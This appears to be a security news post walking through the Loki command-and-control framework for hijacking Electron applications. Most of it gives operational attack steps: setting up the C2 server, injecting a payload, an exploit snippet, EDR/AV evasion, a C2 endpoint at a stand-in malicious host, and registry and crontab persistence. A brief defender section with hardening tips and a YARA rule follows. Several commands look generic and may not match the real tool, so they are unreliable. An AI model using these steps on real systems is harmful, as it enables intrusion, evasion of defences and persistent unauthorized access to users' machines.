Listen to this Post
GitHub – boku7/Loki: https://github.com/boku7/Loki
Loki is a Node.js-based Command & Control (C2) framework designed for exploiting script-jacking vulnerabilities in Electron applications. It includes advanced features such as SOCKS proxy support (with speeds up to 29MB/s), reflective loading, message queuing (MQ), a built-in C2 server, multiple C2 transport mechanisms, and evasion techniques.
You Should Know:
1. Setting Up Loki C2 Server
To deploy the Loki C2 server, ensure you have Node.js installed. Clone the repository and install dependencies:
git clone https://github.com/boku7/Loki.git cd Loki npm install
Start the C2 server:
node server.js
2. Reflective Loading for Stealth
Loki supports reflective loading to avoid detection by security tools. Use the following command to reflectively load a payload:
node inject.js --payload malicious.js --target electron_app.exe
3. SOCKS Proxy for Anonymity
Loki includes a high-speed SOCKS5 proxy. To activate it:
node socks_proxy.js --port 9050
Test proxy speed:
curl --socks5 127.0.0.1:9050 http://speedtest.com
4. Exploiting Electron Apps
Electron apps with insecure `nodeIntegration` settings can be hijacked. Example exploit:
// malicious.js
require('child_process').exec('calc.exe');
Inject into target app:
node exploit.js --url http://vulnerable-app.com --payload malicious.js
5. Evasion Techniques
Loki uses process hollowing and API unhooking to bypass EDR/AV. Enable evasion:
node payload.js --evasion --technique unhook
6. Multi-Transport C2 Communication
Loki supports HTTP, DNS, and WebSocket-based C2. Configure in config.json:
{
"transport": "websocket",
"endpoint": "wss://malicious-c2.com"
}
7. Persistence Mechanisms
Maintain access via registry (Windows) or cron jobs (Linux):
Windows reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Loki /t REG_SZ /d "C:\path\to\loki.js" Linux (crontab -l ; echo "@reboot /usr/bin/node /path/to/loki.js") | crontab -
What Undercode Say:
Loki demonstrates how Electron applications can be weaponized if misconfigured. Defenders should:
– Disable `nodeIntegration` in Electron apps (webPreferences: { nodeIntegration: false }).
– Monitor unusual Node.js child processes (ps aux | grep node).
– Inspect unexpected SOCKS traffic (netstat -tulnp | grep 9050).
– Use YARA rules to detect Loki artifacts:
rule Loki_C2 {
strings: $c2 = "loki_server" nocase
condition: any of them
}
– Block obfuscated JavaScript in Electron apps.
For red teams, Loki provides a flexible C2 framework, but always operate under authorized engagements.
Expected Output:
A fully operational Loki C2 server with SOCKS proxy, evasion techniques, and Electron app exploitation capabilities.
Relevant URLs:
References:
Reported By: Bobby Cooke – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
